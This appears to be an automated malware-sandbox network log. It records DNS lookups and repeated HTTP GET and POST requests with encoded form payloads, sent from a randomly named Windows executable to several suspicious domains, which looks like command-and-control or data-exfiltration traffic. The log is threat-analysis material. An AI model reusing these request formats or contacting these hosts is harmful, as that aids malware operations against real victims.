Dec 9, 2024 17:19:12.939708948 CET	80	49925	108.181.189.7	192.168.2.9
Dec 9, 2024 17:19:13.971590996 CET	80	49925	108.181.189.7	192.168.2.9
Dec 9, 2024 17:19:13.971761942 CET	80	49925	108.181.189.7	192.168.2.9
Dec 9, 2024 17:19:13.971843958 CET	49925	80	192.168.2.9	108.181.189.7
Dec 9, 2024 17:19:13.971880913 CET	80	49925	108.181.189.7	192.168.2.9
Dec 9, 2024 17:19:13.971927881 CET	49925	80	192.168.2.9	108.181.189.7
Dec 9, 2024 17:19:14.329204082 CET	49925	80	192.168.2.9	108.181.189.7
Dec 9, 2024 17:19:15.347707987 CET	49932	80	192.168.2.9	108.181.189.7
Dec 9, 2024 17:19:15.473387957 CET	80	49932	108.181.189.7	192.168.2.9
Dec 9, 2024 17:19:15.473512888 CET	49932	80	192.168.2.9	108.181.189.7
Dec 9, 2024 17:19:15.489495039 CET	49932	80	192.168.2.9	108.181.189.7
Dec 9, 2024 17:19:15.609572887 CET	80	49932	108.181.189.7	192.168.2.9
Dec 9, 2024 17:19:16.818639040 CET	80	49932	108.181.189.7	192.168.2.9
Dec 9, 2024 17:19:16.822124958 CET	80	49932	108.181.189.7	192.168.2.9
Dec 9, 2024 17:19:16.822171926 CET	49932	80	192.168.2.9	108.181.189.7
Dec 9, 2024 17:19:16.822216988 CET	80	49932	108.181.189.7	192.168.2.9
Dec 9, 2024 17:19:16.822257996 CET	49932	80	192.168.2.9	108.181.189.7
Dec 9, 2024 17:19:17.000963926 CET	49932	80	192.168.2.9	108.181.189.7
Dec 9, 2024 17:19:18.020035982 CET	49940	80	192.168.2.9	108.181.189.7
Dec 9, 2024 17:19:18.139820099 CET	80	49940	108.181.189.7	192.168.2.9
Dec 9, 2024 17:19:18.139904022 CET	49940	80	192.168.2.9	108.181.189.7
Dec 9, 2024 17:19:18.155456066 CET	49940	80	192.168.2.9	108.181.189.7
Dec 9, 2024 17:19:18.275307894 CET	80	49940	108.181.189.7	192.168.2.9
Dec 9, 2024 17:19:18.275325060 CET	80	49940	108.181.189.7	192.168.2.9
Dec 9, 2024 17:19:19.598458052 CET	80	49940	108.181.189.7	192.168.2.9
Dec 9, 2024 17:19:19.599492073 CET	80	49940	108.181.189.7	192.168.2.9
Dec 9, 2024 17:19:19.599531889 CET	49940	80	192.168.2.9	108.181.189.7
Dec 9, 2024 17:19:19.599648952 CET	80	49940	108.181.189.7	192.168.2.9
Dec 9, 2024 17:19:19.599684954 CET	49940	80	192.168.2.9	108.181.189.7
Dec 9, 2024 17:19:19.657208920 CET	49940	80	192.168.2.9	108.181.189.7
Dec 9, 2024 17:19:20.676851034 CET	49948	80	192.168.2.9	108.181.189.7
Dec 9, 2024 17:19:20.796295881 CET	80	49948	108.181.189.7	192.168.2.9
Dec 9, 2024 17:19:20.796601057 CET	49948	80	192.168.2.9	108.181.189.7
Dec 9, 2024 17:19:20.806945086 CET	49948	80	192.168.2.9	108.181.189.7
Dec 9, 2024 17:19:20.926299095 CET	80	49948	108.181.189.7	192.168.2.9
Dec 9, 2024 17:19:22.108164072 CET	80	49948	108.181.189.7	192.168.2.9
Dec 9, 2024 17:19:22.108365059 CET	80	49948	108.181.189.7	192.168.2.9
Dec 9, 2024 17:19:22.108402014 CET	80	49948	108.181.189.7	192.168.2.9
Dec 9, 2024 17:19:22.108468056 CET	49948	80	192.168.2.9	108.181.189.7
Dec 9, 2024 17:19:22.108486891 CET	49948	80	192.168.2.9	108.181.189.7
Dec 9, 2024 17:19:22.114990950 CET	49948	80	192.168.2.9	108.181.189.7
Dec 9, 2024 17:19:22.236164093 CET	80	49948	108.181.189.7	192.168.2.9
Dec 9, 2024 17:19:27.609842062 CET	49964	80	192.168.2.9	13.248.169.48
Dec 9, 2024 17:19:27.729851961 CET	80	49964	13.248.169.48	192.168.2.9
Dec 9, 2024 17:19:27.729998112 CET	49964	80	192.168.2.9	13.248.169.48
Dec 9, 2024 17:19:27.750607014 CET	49964	80	192.168.2.9	13.248.169.48
Dec 9, 2024 17:19:27.870224953 CET	80	49964	13.248.169.48	192.168.2.9
Dec 9, 2024 17:19:28.863708973 CET	80	49964	13.248.169.48	192.168.2.9
Dec 9, 2024 17:19:28.863852024 CET	80	49964	13.248.169.48	192.168.2.9
Dec 9, 2024 17:19:28.863894939 CET	49964	80	192.168.2.9	13.248.169.48
Dec 9, 2024 17:19:29.266597033 CET	49964	80	192.168.2.9	13.248.169.48
Dec 9, 2024 17:19:30.285623074 CET	49970	80	192.168.2.9	13.248.169.48
Dec 9, 2024 17:19:30.407902956 CET	80	49970	13.248.169.48	192.168.2.9
Dec 9, 2024 17:19:30.408004999 CET	49970	80	192.168.2.9	13.248.169.48
Dec 9, 2024 17:19:30.422883987 CET	49970	80	192.168.2.9	13.248.169.48
Dec 9, 2024 17:19:30.542184114 CET	80	49970	13.248.169.48	192.168.2.9
Dec 9, 2024 17:19:31.507752895 CET	80	49970	13.248.169.48	192.168.2.9
Dec 9, 2024 17:19:31.507941008 CET	80	49970	13.248.169.48	192.168.2.9
Dec 9, 2024 17:19:31.511483908 CET	49970	80	192.168.2.9	13.248.169.48
Dec 9, 2024 17:19:31.938508987 CET	49970	80	192.168.2.9	13.248.169.48
Dec 9, 2024 17:19:32.957245111 CET	49977	80	192.168.2.9	13.248.169.48
Dec 9, 2024 17:19:33.236669064 CET	80	49977	13.248.169.48	192.168.2.9
Dec 9, 2024 17:19:33.236778021 CET	49977	80	192.168.2.9	13.248.169.48
Dec 9, 2024 17:19:33.256982088 CET	49977	80	192.168.2.9	13.248.169.48
Dec 9, 2024 17:19:33.429466963 CET	80	49977	13.248.169.48	192.168.2.9
Dec 9, 2024 17:19:33.429471970 CET	80	49977	13.248.169.48	192.168.2.9
Dec 9, 2024 17:19:34.338342905 CET	80	49977	13.248.169.48	192.168.2.9
Dec 9, 2024 17:19:34.349114895 CET	80	49977	13.248.169.48	192.168.2.9
Dec 9, 2024 17:19:34.349170923 CET	49977	80	192.168.2.9	13.248.169.48
Dec 9, 2024 17:19:34.766824007 CET	49977	80	192.168.2.9	13.248.169.48
Dec 9, 2024 17:19:35.785574913 CET	49983	80	192.168.2.9	13.248.169.48
Dec 9, 2024 17:19:35.905052900 CET	80	49983	13.248.169.48	192.168.2.9
Dec 9, 2024 17:19:35.905224085 CET	49983	80	192.168.2.9	13.248.169.48
Dec 9, 2024 17:19:35.914987087 CET	49983	80	192.168.2.9	13.248.169.48
Dec 9, 2024 17:19:36.034228086 CET	80	49983	13.248.169.48	192.168.2.9
Dec 9, 2024 17:19:37.014415026 CET	80	49983	13.248.169.48	192.168.2.9
Dec 9, 2024 17:19:37.014678955 CET	80	49983	13.248.169.48	192.168.2.9
Dec 9, 2024 17:19:37.014753103 CET	49983	80	192.168.2.9	13.248.169.48
Dec 9, 2024 17:19:37.060215950 CET	49983	80	192.168.2.9	13.248.169.48
Dec 9, 2024 17:19:37.179773092 CET	80	49983	13.248.169.48	192.168.2.9

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 9, 2024 17:18:55.262607098 CET	61741	53	192.168.2.9	1.1.1.1
Dec 9, 2024 17:18:55.990567923 CET	53	61741	1.1.1.1	192.168.2.9
Dec 9, 2024 17:19:12.364352942 CET	53888	53	192.168.2.9	1.1.1.1
Dec 9, 2024 17:19:12.679291010 CET	53	53888	1.1.1.1	192.168.2.9
Dec 9, 2024 17:19:27.129637957 CET	50354	53	192.168.2.9	1.1.1.1
Dec 9, 2024 17:19:27.606950045 CET	53	50354	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 9, 2024 17:18:55.262607098 CET	192.168.2.9	1.1.1.1	0x1b43	Standard query (0)	www.bloodbalancecaps.shop	A (IP address)	IN (0x0001)	false
Dec 9, 2024 17:19:12.364352942 CET	192.168.2.9	1.1.1.1	0xe08c	Standard query (0)	www.jalan2.online	A (IP address)	IN (0x0001)	false
Dec 9, 2024 17:19:27.129637957 CET	192.168.2.9	1.1.1.1	0x3ec8	Standard query (0)	www.avalanchefi.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 9, 2024 17:17:31.868858099 CET	1.1.1.1	192.168.2.9	0x4b50	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 9, 2024 17:17:31.868858099 CET	1.1.1.1	192.168.2.9	0x4b50	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 9, 2024 17:18:55.990567923 CET	1.1.1.1	192.168.2.9	0x1b43	No error (0)	www.bloodbalancecaps.shop	bloodbalancecaps.shop		CNAME (Canonical name)	IN (0x0001)	false
Dec 9, 2024 17:18:55.990567923 CET	1.1.1.1	192.168.2.9	0x1b43	No error (0)	bloodbalancecaps.shop		108.179.253.197	A (IP address)	IN (0x0001)	false
Dec 9, 2024 17:19:12.679291010 CET	1.1.1.1	192.168.2.9	0xe08c	No error (0)	www.jalan2.online	jalan2.online		CNAME (Canonical name)	IN (0x0001)	false
Dec 9, 2024 17:19:12.679291010 CET	1.1.1.1	192.168.2.9	0xe08c	No error (0)	jalan2.online		108.181.189.7	A (IP address)	IN (0x0001)	false
Dec 9, 2024 17:19:27.606950045 CET	1.1.1.1	192.168.2.9	0x3ec8	No error (0)	www.avalanchefi.xyz		13.248.169.48	A (IP address)	IN (0x0001)	false
Dec 9, 2024 17:19:27.606950045 CET	1.1.1.1	192.168.2.9	0x3ec8	No error (0)	www.avalanchefi.xyz		76.223.54.146	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.bloodbalancecaps.shop

www.jalan2.online

www.avalanchefi.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49889	108.179.253.197	80	6064	C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 17:18:56.129973888 CET	544	OUT	GET /7n6c/?tJ=iJE0gvFHj8PDX8qP&HvrT-t9X=ePeKNPyUeLpNn1usywRT/cMVaB/hHeJrwPLb6fKcgQCso5jGZqjP6M9GYYTFao+4npn6icqsLwsi7nEjf66U/gVo6YEkdyxhX4vgPFwxoIoJ2c6DSA== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.bloodbalancecaps.shop Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Dec 9, 2024 17:18:57.335977077 CET	560	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 09 Dec 2024 16:18:57 GMT Server: nginx/1.23.4 Content-Type: text/html; charset=UTF-8 Content-Length: 0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: http://bloodbalancecaps.shop/7n6c/?tJ=iJE0gvFHj8PDX8qP&HvrT-t9X=ePeKNPyUeLpNn1usywRT/cMVaB/hHeJrwPLb6fKcgQCso5jGZqjP6M9GYYTFao+4npn6icqsLwsi7nEjf66U/gVo6YEkdyxhX4vgPFwxoIoJ2c6DSA== X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49925	108.181.189.7	80	6064	C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 17:19:12.816802979 CET	795	OUT	POST /xu9o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.jalan2.online Origin: http://www.jalan2.online Referer: http://www.jalan2.online/xu9o/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 197 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Data Raw: 48 76 72 54 2d 74 39 58 3d 56 33 36 48 6e 6d 69 69 37 39 65 36 5a 61 44 49 36 54 53 62 6c 71 66 57 73 56 72 4b 54 35 74 77 69 59 35 5a 30 39 7a 72 57 36 2b 51 66 54 78 4e 72 72 51 75 58 39 56 63 64 45 51 33 4c 4a 77 6e 38 36 78 35 55 56 74 4c 63 55 45 42 68 61 4c 6a 47 6e 77 6c 4d 72 30 69 4c 55 74 43 75 4a 4a 66 56 6c 57 33 4e 74 46 67 58 31 64 74 56 47 6f 30 2b 71 61 48 56 42 4b 6b 6a 38 52 6f 63 52 31 69 53 52 55 62 68 4b 69 4f 70 39 35 56 46 70 38 7a 69 49 6b 72 6d 49 7a 34 36 52 52 30 53 6f 48 6b 55 5a 6f 45 4b 56 4d 76 72 46 44 4a 69 2f 34 76 70 74 56 57 72 4c 64 55 41 39 48 2b Data Ascii: HvrT-t9X=V36Hnmii79e6ZaDI6TSblqfWsVrKT5twiY5Z09zrW6+QfTxNrrQuX9VcdEQ3LJwn86x5UVtLcUEBhaLjGnwlMr0iLUtCuJJfVlW3NtFgX1dtVGo0+qaHVBKkj8RocR1iSRUbhKiOp95VFp8ziIkrmIz46RR0SoHkUZoEKVMvrFDJi/4vptVWrLdUA9H+
Dec 9, 2024 17:19:13.971590996 CET	279	IN	HTTP/1.1 404 Not Found content-type: text/html cache-control: private, no-cache, max-age=0 pragma: no-cache date: Mon, 09 Dec 2024 16:19:13 GMT server: LiteSpeed content-encoding: gzip vary: Accept-Encoding transfer-encoding: chunked connection: close Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a Data Ascii: a
Dec 9, 2024 17:19:13.971761942 CET	713	IN	Data Raw: 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e Data Ascii: 2bdeTkk0^M'va;fc6[u')]I\|ut9W?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqfw6@!Edt,CH4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49932	108.181.189.7	80	6064	C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 17:19:15.489495039 CET	819	OUT	POST /xu9o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.jalan2.online Origin: http://www.jalan2.online Referer: http://www.jalan2.online/xu9o/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 221 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Data Raw: 48 76 72 54 2d 74 39 58 3d 56 33 36 48 6e 6d 69 69 37 39 65 36 4c 72 7a 49 34 31 61 62 77 61 66 56 6a 31 72 4b 61 5a 74 38 69 59 31 5a 30 2f 44 37 57 70 57 51 52 54 42 4e 36 5a 6f 75 51 39 56 63 57 6b 51 79 57 5a 77 75 38 36 39 48 55 51 56 4c 63 55 67 42 68 66 33 6a 42 55 6f 6d 50 62 30 67 53 45 74 41 7a 35 4a 66 56 6c 57 33 4e 75 35 47 58 31 56 74 56 58 59 30 2f 4c 61 45 54 78 4b 6a 31 73 52 6f 59 52 31 6d 53 52 56 49 68 4a 6d 6f 70 2f 42 56 46 6f 4d 7a 6a 5a 6b 6b 74 49 79 39 30 78 52 68 63 4c 79 78 51 70 73 53 45 44 55 4f 7a 45 54 56 6c 65 45 78 34 66 63 4e 2b 63 64 7a 48 61 4f 57 2f 6b 79 4d 4f 76 65 69 61 7a 64 30 32 39 58 32 41 58 41 31 64 77 3d 3d Data Ascii: HvrT-t9X=V36Hnmii79e6LrzI41abwafVj1rKaZt8iY1Z0/D7WpWQRTBN6ZouQ9VcWkQyWZwu869HUQVLcUgBhf3jBUomPb0gSEtAz5JfVlW3Nu5GX1VtVXY0/LaETxKj1sRoYR1mSRVIhJmop/BVFoMzjZkktIy90xRhcLyxQpsSEDUOzETVleEx4fcN+cdzHaOW/kyMOveiazd029X2AXA1dw==
Dec 9, 2024 17:19:16.818639040 CET	279	IN	HTTP/1.1 404 Not Found content-type: text/html cache-control: private, no-cache, max-age=0 pragma: no-cache date: Mon, 09 Dec 2024 16:19:16 GMT server: LiteSpeed content-encoding: gzip vary: Accept-Encoding transfer-encoding: chunked connection: close Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a Data Ascii: a
Dec 9, 2024 17:19:16.822124958 CET	713	IN	Data Raw: 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e Data Ascii: 2bdeTkk0^M'va;fc6[u')]I\|ut9W?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqfw6@!Edt,CH4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49940	108.181.189.7	80	6064	C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 17:19:18.155456066 CET	1832	OUT	POST /xu9o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.jalan2.online Origin: http://www.jalan2.online Referer: http://www.jalan2.online/xu9o/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1233 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Data Raw: 48 76 72 54 2d 74 39 58 3d 56 33 36 48 6e 6d 69 69 37 39 65 36 4c 72 7a 49 34 31 61 62 77 61 66 56 6a 31 72 4b 61 5a 74 38 69 59 31 5a 30 2f 44 37 57 76 4f 51 52 67 4a 4e 6f 4f 38 75 52 39 56 63 56 6b 51 7a 57 5a 78 75 38 2b 5a 4c 55 51 51 38 63 57 49 42 69 36 37 6a 41 6c 6f 6d 59 72 30 67 64 6b 74 44 75 4a 4a 4b 56 6c 47 72 4e 74 42 47 58 31 56 74 56 55 41 30 37 61 61 45 49 78 4b 6b 6a 38 52 61 63 52 30 44 53 52 63 39 68 49 53 65 75 50 68 56 46 49 63 7a 68 72 63 6b 67 49 79 2f 33 78 51 6b 63 4c 76 68 51 70 67 34 45 44 49 77 7a 44 66 56 6d 76 74 6f 67 4c 45 78 69 2b 68 51 42 37 7a 31 7a 79 53 61 50 4e 48 4a 4f 57 41 61 33 38 6d 71 4c 45 6c 59 50 51 59 32 74 2b 67 75 6f 52 39 70 44 63 78 4f 37 38 59 6e 48 47 49 68 70 64 57 73 4c 69 63 36 46 75 62 79 45 45 6e 55 4d 65 4b 35 44 30 73 71 39 74 64 42 78 63 65 6c 64 74 43 4f 4a 7a 5a 30 31 75 6a 68 38 6b 33 36 35 73 49 65 49 66 39 68 41 50 4a 72 72 38 42 61 67 64 6f 55 76 30 34 33 38 68 58 31 34 32 75 33 72 55 48 42 57 69 51 2b 4f 58 43 53 65 63 2f 6c 59 [TRUNCATED] Data Ascii: HvrT-t9X=V36Hnmii79e6LrzI41abwafVj1rKaZt8iY1Z0/D7WvOQRgJNoO8uR9VcVkQzWZxu8+ZLUQQ8cWIBi67jAlomYr0gdktDuJJKVlGrNtBGX1VtVUA07aaEIxKkj8RacR0DSRc9hISeuPhVFIczhrckgIy/3xQkcLvhQpg4EDIwzDfVmvtogLExi+hQB7z1zySaPNHJOWAa38mqLElYPQY2t+guoR9pDcxO78YnHGIhpdWsLic6FubyEEnUMeK5D0sq9tdBxceldtCOJzZ01ujh8k365sIeIf9hAPJrr8BagdoUv0438hX142u3rUHBWiQ+OXCSec/lYQ+/CLhbLnhCoxVlzOtPKRTwTm4p+9U36uliHCn9F1Mgj62GlGcCy6IVjcSgfe+/C1IZ8hlp0o+NcX8ar9xYd5QC3BZqtAHceaVtMzQDfj4ZfE5qw20/2dSB8r+kgbR25nC4L2DhRmUSKCKJWVtTIaNFNb5475c5YCOW52AduoGxDqY20FAhu5xm5jcoY8avcVmYr+08IeoilBvTUY/zVoh3zSpz22CgpaTK/H7KAdATOHQ5enp2NPrSqdoy5xAc4BbYDwqmOobMLqtH5/Dw6GnE1yBwuVEzJpYczrkAcRELNgvCgH4lKtAtU6gTrgG96nF9On4d6nBnPHApm+GwzhCsXk2+dsozqs6nAvnEh2C6AZfPD6xysk01yNqe0omOkr9xlFv/Um5wb7t/LnEYdFaxZNJ6uC9lHE3RsEoZbj9v5s4r8TMeZsdIvOFUVflOxOF8fpJtPS/TyafgfIk0mlYABeCRq4ri2wjvauZY/y9nJWNScqJsjO8fOXGDbQayrXCowyirBL+0/HGCekDmCBw/nSMVxCBKV8kpNyNlcrquWG1iFFWzA/kbWeOJxIdCJmrOXKBrnY7tY1Cq3XiZQ6HfP/wzDh3bkSTFYktmzbRQbO2lIFqPvdFPsxUeCO1xYcTh7A0P6erDpkXSXPeIOlmgbW6qLfMZVC9 [TRUNCATED]
Dec 9, 2024 17:19:19.598458052 CET	279	IN	HTTP/1.1 404 Not Found content-type: text/html cache-control: private, no-cache, max-age=0 pragma: no-cache date: Mon, 09 Dec 2024 16:19:18 GMT server: LiteSpeed content-encoding: gzip vary: Accept-Encoding transfer-encoding: chunked connection: close Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a Data Ascii: a
Dec 9, 2024 17:19:19.599492073 CET	713	IN	Data Raw: 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e Data Ascii: 2bdeTkk0^M'va;fc6[u')]I\|ut9W?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqfw6@!Edt,CH4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49948	108.181.189.7	80	6064	C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 17:19:20.806945086 CET	536	OUT	GET /xu9o/?HvrT-t9X=Y1SnkQLh9oyCIrW1nUOSuZnR7CuPFYt1zoY93P6OWbCvdS06v54NadN0bxhIZaxlyI96f1lIInN9xaPSBVcrcY9ba19Ly4xWTmryN/t4ZE1RM2wdiA==&tJ=iJE0gvFHj8PDX8qP HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.jalan2.online Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Dec 9, 2024 17:19:22.108164072 CET	1236	IN	HTTP/1.1 404 Not Found content-type: text/html cache-control: private, no-cache, max-age=0 pragma: no-cache content-length: 1249 date: Mon, 09 Dec 2024 16:19:21 GMT server: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, [TRUNCATED]
Dec 9, 2024 17:19:22.108365059 CET	224	IN	Data Raw: 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c Data Ascii: 3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49964	13.248.169.48	80	6064	C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe

Timestamp	Bytes transferred	Direction	Data
